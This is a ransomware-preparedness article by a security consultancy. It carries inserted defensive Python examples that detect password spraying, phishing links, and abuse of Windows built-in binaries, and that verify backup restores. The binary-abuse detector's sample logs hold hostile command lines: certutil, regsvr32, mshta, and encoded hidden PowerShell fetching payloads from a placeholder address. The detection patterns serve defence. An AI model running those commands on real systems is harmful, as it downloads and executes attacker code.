Cyber criminals are targeting more businesses than ever before with ransomware, malware that encrypts a victim's systems and renders them unusable until a ransom is paid (often in Bitcoin or another cryptocurrency). The attack halts daily operations until the systems are restored, whether from backups or by paying, and it imposes a significant financial burden on the organization. And while some companies may believe they are safe, that isn't necessarily true.
Many businesses operate under the impression that they aren't targets for cyber criminals because they don't store personally identifiable information (PII) or electronic protected health information (ePHI) on their networks. But attackers can bring any organization's operations to a halt with ransomware, regardless of its industry or the data it maintains. That makes anyone who relies on computers for day-to-day business operations a target.
Financial implications of ransomware
Ransomware entered public awareness when CryptoLocker, a notorious piece of malware, was unleashed in 2013. New and more sophisticated variants, such as Bad Rabbit, WannaCry, Petya, and Ryuk, have since emerged along with higher ransom demands. Since 2015, over 215 different variants have been discovered, and only 97 of them have known remediation tools. Ryuk is particularly impactful because it can spread across an entire enterprise network, creating a true business interruption event. In fact, officials in Jackson County, Georgia were recently forced to pay $400,000 in ransom after a Ryuk infection.
How does a company become infected by ransomware?
There are many methods through which ransomware can enter the network. Some of the more common methods include:
- Poor authentication practices. Many organizations expose login prompts to the internet. If those portals are not protected by strong authentication, including lengthy, complex password requirements and multifactor authentication, an attacker can simply guess login credentials.
- Email phishing messages. If a user opens an infected attachment or downloads malware from a malicious website linked in a message, they put their company at risk of an attack.
- Infected web pages. A compromised website can download and execute malware on a user's PC, typically by exploiting an unpatched browser or plug-in.
- A mobile device. If an employee uses a laptop or other mobile device running a Microsoft operating system outside the organization's firewall, without a personal firewall or with a critical patch missing, the device can be infected and then infect the internal network once it reconnects.
- Weak passwords. Employees using servers in a demilitarized zone (DMZ) that is exposed to the internet put the network at risk if they use weak passwords that an attacker can guess or otherwise compromise.
Once an attacker gains access to an externally facing service such as Remote Desktop Protocol (RDP), Outlook Web Access (OWA), Citrix Gateway, a VPN, or some other remote-access service, they attempt to escalate their privileges on the network to the highest level, typically domain administrator, from which the ransomware can be pushed to every system.
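The credential-guessing path above is also the easiest one to see coming on the portal side. The following is an added example, not from the original article, of the detection logic a practitioner would run over authentication logs: it parses a small constructed log of login attempts (time, source address, account, result; the pipe-separated format and the thresholds are assumptions for the demo) and raises alerts for password spraying, brute force against a single account, and a success from a source that was just guessing.

```python
"""Detect credential guessing against an internet-facing login portal.

Added example, not part of the original article. It runs over a small,
constructed authentication log (one line per attempt:
time|source_ip|account|result) and raises three kinds of alert:
password spray (one source, many accounts), brute force (one source,
one account, many attempts) and a success from a source that was just
guessing. Thresholds and the log format are assumptions for the demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # assumption: tune to your portal's traffic
SPRAY_ACCOUNTS = 5               # distinct accounts failing from one source
BRUTE_ATTEMPTS = 10              # failures against one account from one source

# Constructed sample log. 198.51.100.23 sprays six accounts and lands one;
# 203.0.113.9 is a user mistyping once; 192.0.2.44 hammers "helpdesk".
SAMPLE_AUTH_LOG = "\n".join(
    [f"2019-03-12T02:00:{i + 1:02d}Z|198.51.100.23|{u}|FAIL"
     for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + ["2019-03-12T02:00:07Z|198.51.100.23|grace|SUCCESS",
       "2019-03-12T08:30:00Z|203.0.113.9|alice|FAIL",
       "2019-03-12T08:30:30Z|203.0.113.9|alice|SUCCESS"]
    + [f"2019-03-12T09:00:{s:02d}Z|192.0.2.44|helpdesk|FAIL" for s in range(12)]
)


def parse_auth_log(text):
    """Parse the pipe-separated log into dicts sorted by time."""
    events = []
    for line in text.strip().splitlines():
        ts, ip, user, result = line.split("|")
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "ip": ip,
            "user": user.lower(),
            "ok": result == "SUCCESS",
        })
    return sorted(events, key=lambda e: e["time"])


def detect(events):
    """Return alerts for spraying, brute force and successes that follow them."""
    alerts = []
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    for ip, evs in sorted(by_ip.items()):
        failures = [e for e in evs if not e["ok"]]
        sprayed_at = None      # time the spray alert fired for this source
        bruted = set()         # accounts already reported as brute-forced

        for i, first in enumerate(failures):
            # All failures from this source within WINDOW of `first`.
            window = [e for e in failures[i:] if e["time"] - first["time"] <= WINDOW]
            users = {e["user"] for e in window}
            if sprayed_at is None and len(users) >= SPRAY_ACCOUNTS:
                sprayed_at = first["time"]
                alerts.append({"type": "password_spray", "ip": ip,
                               "accounts": sorted(users)})
            for user in users - bruted:
                attempts = sum(1 for e in window if e["user"] == user)
                if attempts >= BRUTE_ATTEMPTS:
                    bruted.add(user)
                    alerts.append({"type": "brute_force", "ip": ip,
                                   "accounts": [user], "attempts": attempts})

        # A success from a source that was guessing is the one to act on first:
        # the credential is now in the attacker's hands.
        for e in evs:
            if not e["ok"]:
                continue
            after_spray = (sprayed_at is not None
                           and timedelta(0) <= e["time"] - sprayed_at <= WINDOW)
            if after_spray or e["user"] in bruted:
                alerts.append({"type": "success_after_guessing", "ip": ip,
                               "accounts": [e["user"]]})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

Run it directly to print the alerts. The third alert type is the one to act on first: a success from a source that was spraying means a guessed credential is now in use, so the account should be locked and its sessions revoked. Multifactor authentication on the portal closes the gap the spray finds; this detection tells you when it was needed.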
Limit the likelihood of a ransomware attack
For in-depth technical information about how to minimize and mitigate exposure to ransomware, consider the resources offered by SANS Internet Storm Center and the U.S. Computer Emergency Readiness Team. Additionally, there are several key strategies your organization can use to prevent or limit the impact of ransomware.
Raise phishing awareness
Malware typically needs a helper: for a phishing attack to succeed, an employee must open an infected attachment or visit an infected site. Educate users on phishing scenarios and run internal phishing tests to gauge employee readiness. Tests should familiarize employees with common phishing scenarios and teach them to identify masked links (link text that shows one address while the link points at another) and spoofed sender addresses.
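As an added example (not code from the article), the check below applies the two tells the training should teach, masked links and spoofed senders, to a constructed HTML phishing message: it compares each link's visible text with its real destination, and compares the From domain with the Return-Path and Reply-To domains. All domains are reserved example names, and the domain comparison (last two labels of each host) is an assumption that stands in for a proper public-suffix lookup.

```python
"""Flag two phishing tells in a message: masked links and spoofed senders.

Added example, not from the original article. Standard library only. The
e-mail below is constructed for the demonstration; every domain in it is
a reserved example name. The domain comparison uses the last two labels
of each hostname, an approximation that stands in for a public-suffix list.
"""
import email
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message: the visible link says mail.corp.example.com,
# the real target is a look-alike domain, and the bounce/reply addresses
# do not belong to the From domain.
SAMPLE_EML = """\
From: "IT Helpdesk" <helpdesk@corp.example.com>
Return-Path: <bounce@mail-relay.example.net>
Reply-To: <support@corp-example-login.example.net>
To: alice@corp.example.com
Subject: Password expiry notice
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your password expires today. Sign in to keep your account:</p>
<p><a href="http://corp-example-login.example.net/owa">https://mail.corp.example.com/owa</a></p>
<p><a href="https://intranet.corp.example.com/policies">Company policy</a></p>
</body></html>
"""

# Visible link text that itself looks like a URL or bare hostname.
URL_LIKE = re.compile(r"^(?:https?://)?(?:[\w-]+\.)+[a-z]{2,}(?:/\S*)?$", re.I)


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def base_domain(host):
    """Approximate registrable domain: the last two labels (no public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def host_of(url):
    """Hostname of a URL, tolerating link text with no scheme."""
    if "://" not in url:
        url = "http://" + url
    return urlparse(url).hostname or ""


def masked_links(html):
    """Links whose visible text is a URL that points somewhere other than the href."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        if not URL_LIKE.match(text):
            continue
        shown, actual = base_domain(host_of(text)), base_domain(host_of(href))
        if shown != actual:
            findings.append({"shown": text, "actual": href})
    return findings


def sender_findings(msg):
    """Header tells: envelope or reply domain differs from From; address hidden in display name."""
    findings = []
    name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = base_domain(from_addr.rpartition("@")[2])
    if "@" in name:
        findings.append(f"display name contains an address: {name!r}")
    for header in ("Return-Path", "Reply-To"):
        value = msg.get(header)
        if not value:
            continue
        domain = base_domain(parseaddr(value)[1].rpartition("@")[2])
        if domain != from_domain:
            findings.append(f"{header} domain {domain} differs from From domain {from_domain}")
    return findings


def analyze(raw):
    """Parse a raw RFC 822 message and run both checks."""
    msg = email.message_from_string(raw)
    html = ""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            html = part.get_payload(decode=True).decode(charset, "replace")
    return {"masked_links": masked_links(html), "sender": sender_findings(msg)}


if __name__ == "__main__":
    print(analyze(SAMPLE_EML))
```

The same two comparisons are what a user is being asked to do by eye when they hover over a link or expand the sender; automating them at the mail gateway catches the cases training will always miss. Neither check proves a message is malicious (mailing-list relays legitimately rewrite Return-Path), so treat the output as a score input rather than a block decision.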
Add strong user controls
You can help mitigate risk by limiting user permissions to only the programs and systems each person needs to do their job:
- Limit local administrator rights on PCs, workstations, and laptops.
- Anyone logged in with administrator-level credentials should not use that session for email, web browsing, or other general computer use.
- Network and domain administrators should have two sets of credentials: one for general use and one for elevated privileges.
- Implement a policy, and enforce it in practice, that administrators do not log into workstations with domain administrator rights.
Add software controls to minimize user access
One way to prevent employees from running a malware file is with software controls that limit which applications and files a user can execute. Consider application whitelisting with AppLocker (or Windows Defender Application Control), together with exploit mitigations such as Exploit Protection in Windows Defender Exploit Guard, which superseded EMET after Microsoft ended EMET support in 2018. Attackers have their favorite methods of delivering malware into organizations, often by abusing binaries that ship with Windows (mshta.exe, regsvr32.exe, certutil.exe and rundll32.exe are common examples). Knowing whether these binaries are used legitimately in your environment lets you block them outright or increase logging and alerting around them.
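As an added example that is not part of the article, the script below does the inventory step described above over constructed process-creation records in the shape Sysmon event 1 or Windows event 4688 provide (time, host, user, parent image, image, command line; the pipe-separated layout, the watch list and the argument patterns are assumptions for the demo). It reports which watched binaries run and by whom, so you can see what legitimate use exists before blocking, and it flags invocations whose arguments match known abuse patterns or whose parent is an Office application.

```python
"""Inventory and alert on Windows built-in binaries that attackers abuse.

Added example, not part of the original article. It reads constructed
process-creation records (the fields Sysmon event 1 or Windows event
4688 provide: time|host|user|parent image|image|command line), builds a
baseline of which watched binaries run and by whom, and flags invocations
whose arguments match known abuse patterns or whose parent is an Office
application. The watch list and patterns are assumptions for the demo.
"""
import re
from collections import Counter, defaultdict

# Watched binaries and argument patterns that signal abuse (case-insensitive).
SUSPICIOUS_ARGS = {
    "certutil.exe": [r"-urlcache", r"-decode"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "mshta.exe": [r"https?://", r"(?:java|vb)script:"],
    "rundll32.exe": [r"javascript:"],
    "powershell.exe": [r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{8,}",
                       r"downloadstring", r"-w(?:indowstyle)?\s+hidden"],
    "bitsadmin.exe": [r"/transfer"],
    "wscript.exe": [r"\\(?:temp|downloads)\\"],
    "cscript.exe": [r"\\(?:temp|downloads)\\"],
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample events (203.0.113.7 is a reserved documentation address).
SAMPLE_EVENTS = r"""
2019-03-12T08:01:03Z|WS-0142|CORP\alice|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.7/update.dat C:\Users\alice\AppData\Local\Temp\update.exe
2019-03-12T08:01:09Z|WS-0142|CORP\alice|C:\Windows\System32\cmd.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s /n /u /i:http://203.0.113.7/s.sct scrobj.dll
2019-03-12T08:15:44Z|SRV-PKI-01|CORP\svc-pki|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -pulse
2019-03-12T09:02:11Z|WS-0099|CORP\bob|C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe https://203.0.113.7/a.hta
2019-03-12T09:30:00Z|WS-0211|CORP\carol|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\carol\notes.txt
2019-03-12T10:12:27Z|WS-0142|CORP\alice|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2019-03-12T11:00:00Z|WS-0305|CORP\dave|C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
"""


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Split the pipe-separated records into dicts (command line may contain pipes)."""
    fields = ("time", "host", "user", "parent", "image", "cmdline")
    return [dict(zip(fields, line.split("|", 5))) for line in text.strip().splitlines()]


def inventory(events):
    """Baseline: for each watched binary, how often each user ran it."""
    seen = defaultdict(Counter)
    for e in events:
        name = basename(e["image"])
        if name in SUSPICIOUS_ARGS:
            seen[name][e["user"]] += 1
    return dict(seen)


def suspicious(events):
    """Events whose arguments or parent process match an abuse pattern."""
    alerts = []
    for e in events:
        name = basename(e["image"])
        if name not in SUSPICIOUS_ARGS:
            continue
        reasons = [f"{name} argument matches /{p}/"
                   for p in SUSPICIOUS_ARGS[name] if re.search(p, e["cmdline"], re.I)]
        parent = basename(e["parent"])
        if parent in OFFICE_PARENTS:
            reasons.append(f"launched by Office process {parent}")
        if reasons:
            alerts.append({"time": e["time"], "host": e["host"], "user": e["user"],
                           "image": name, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    for name, users in sorted(inventory(events).items()):
        print(f"{name}: {dict(users)}")
    for alert in suspicious(events):
        print(alert)
```

In the sample, the PKI server's certutil -pulse shows up in the inventory but not in the alerts, which is the distinction that matters: an AppLocker rule that blocks certutil.exe outright would break that server, whereas alerting on -urlcache and -decode, or denying certutil.exe only to workstation users, does not. The Office-parent rule catches the phishing chain in the first event regardless of which binary the macro launches.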
Ransomware often spreads to whatever devices it can communicate with and control, by exploiting unpatched vulnerabilities or by using compromised user accounts. Proper network segmentation limits the internal attack surface by preventing communication between device types that have no need to talk to each other. Restricting communication between devices on your network to only what is necessary greatly reduces the potential impact of a ransomware attack.
Validate the integrity of your backup and restoration capabilities
Attackers cause additional damage during an attack by deleting or encrypting online backups, so that the victim cannot recover without paying. Implement backup and restoration procedures that guard your company against that outcome:
- Keep offline copies of backup and restore files, on media that the network cannot reach once the backup completes
- Save all electronic backup and restore files in a well-secured location
- Perform a thorough review of file permissions for network file shares, paying special attention to locations that store electronic backup and restore files
- Practice a full system and data restore to confirm that the backups are complete and usable and that your team can actually carry out the recovery
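A restore test is only meaningful if you can tell a clean restore from one where files came back encrypted or truncated. The following is an added example, not from the article: it records a SHA-256 for every backed-up file, seals that manifest with an HMAC under a key assumed to be kept offline with the backup media, and after a constructed test restore reports missing, changed and unexpected files while rejecting a manifest that has been edited. The sample files and the key handling are assumptions for the demonstration.

```python
"""Verify a restore against a sealed manifest taken at backup time.

Added example, not from the original article. At backup time it records a
SHA-256 for every file and seals the manifest with an HMAC under a key
that is assumed to be kept offline with the backup media. After a test
restore it reports files that are missing, changed (for instance
encrypted by ransomware) or unexpected, and it rejects a manifest that
has been edited. The sample files are constructed in a temporary directory.
"""
import hashlib
import hmac
import json
import os
import tempfile
from pathlib import Path


def sha256_file(path):
    """Stream a file through SHA-256."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map each file's path relative to root to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def _canonical(manifest):
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def seal_manifest(manifest, key):
    """Serialise the manifest with an HMAC-SHA256 tag under the offline key."""
    tag = hmac.new(key, _canonical(manifest), hashlib.sha256).hexdigest()
    return json.dumps({"manifest": manifest, "hmac": tag}, sort_keys=True)


def open_manifest(sealed, key):
    """Return the manifest, or raise if the tag does not verify."""
    doc = json.loads(sealed)
    expected = hmac.new(key, _canonical(doc["manifest"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["hmac"]):
        raise ValueError("manifest HMAC mismatch: manifest altered or wrong key")
    return doc["manifest"]


def verify_restore(root, manifest):
    """Compare a restored tree with the manifest."""
    actual = build_manifest(root)
    missing = sorted(set(manifest) - set(actual))
    extra = sorted(set(actual) - set(manifest))
    modified = sorted(p for p in manifest.keys() & actual.keys() if manifest[p] != actual[p])
    return {"missing": missing, "modified": modified, "extra": extra,
            "ok": not (missing or modified or extra)}


def demo():
    """Run the whole cycle on constructed files; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = Path(tmp, "backup")
        (backup / "finance").mkdir(parents=True)
        (backup / "finance" / "ledger.csv").write_text("id,amount\n1,100\n")
        (backup / "readme.txt").write_text("quarterly backup\n")

        key = os.urandom(32)  # assumption: stored offline, never on the file server
        sealed = seal_manifest(build_manifest(backup), key)
        manifest = open_manifest(sealed, key)
        clean = verify_restore(backup, manifest)

        # A bad restore: the ledger came back encrypted, a ransom note was
        # added and readme.txt never made it.
        restored = Path(tmp, "restored")
        (restored / "finance").mkdir(parents=True)
        (restored / "finance" / "ledger.csv").write_bytes(os.urandom(40))
        (restored / "finance" / "README_FOR_DECRYPT.txt").write_text("pay up\n")
        bad = verify_restore(restored, manifest)

        # An attacker who rewrites the manifest to match the encrypted file
        # cannot produce a valid tag without the offline key.
        doc = json.loads(sealed)
        doc["manifest"]["finance/ledger.csv"] = sha256_file(restored / "finance" / "ledger.csv")
        try:
            open_manifest(json.dumps(doc), key)
            forged_detected = False
        except ValueError:
            forged_detected = True

    return {"clean_ok": clean["ok"], "restored": bad, "forged_manifest_detected": forged_detected}


if __name__ == "__main__":
    print(demo())
```

The HMAC matters because an attacker with write access to the backup share could otherwise encrypt the files and rewrite the manifest to match; the offline key is what stops that, which is the same reasoning behind keeping an offline copy of the backup itself. Store the sealed manifest with the offline copy and run the verification as part of every restore drill, not only when an incident forces one.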
How we can help
As part of an overall cybersecurity assessment, our professionals can run a vulnerability scan to identify the holes in your organization’s security. Even more, we can perform a ransomware preparedness assessment to measure your company’s ability to defend against and mitigate the impact of a ransomware infection.